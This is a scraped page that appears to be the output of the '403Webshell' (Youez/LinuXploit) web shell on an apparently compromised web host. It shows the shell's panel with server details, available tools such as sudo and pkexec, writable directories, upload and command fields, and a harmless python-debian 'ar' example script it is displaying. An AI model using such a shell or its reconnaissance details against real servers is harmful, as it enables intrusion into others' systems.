403Webshell
Server IP : 172.67.131.151  /  Your IP : 172.71.28.164
Web Server : Apache
System : Linux keen-cori.18-142-40-148.plesk.page 5.15.0-1084-aws #91~20.04.1-Ubuntu SMP Fri May 2 06:59:36 UTC 2025 x86_64
User : simottodesign.com_2tntp341vs7 ( 10011)
PHP Version : 8.3.31
Disable Function : opcache_get_status
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/share/doc/python3-debian/examples/debfile/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/share/doc/python3-debian/examples/debfile/ar
#!/usr/bin/python

# ar.py: ar emulation using ArFile 
# Copyright (C) 2007    Filippo Giunchedi   <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.

from __future__ import print_function

import os
import sys

from debian import arfile

if __name__ == '__main__':
    if len(sys.argv) < 3:
        print("usage: arfile.py [tp] <arfile>")
        sys.exit(1)
    
    if not os.path.exists(sys.argv[2]):
        print("please provide a file to operate on")
        sys.exit(1)
        
    a = arfile.ArFile(sys.argv[2])

    if sys.argv[1] == 't':
        print("\n".join(a.getnames()))
    elif sys.argv[1] == 'p':
        for m in a.getmembers():
            #print("".join(m.readlines()))
            sys.stdout.write("".join(m.readlines()))

Youez - 2016 - github.com/yon3zu
LinuXploit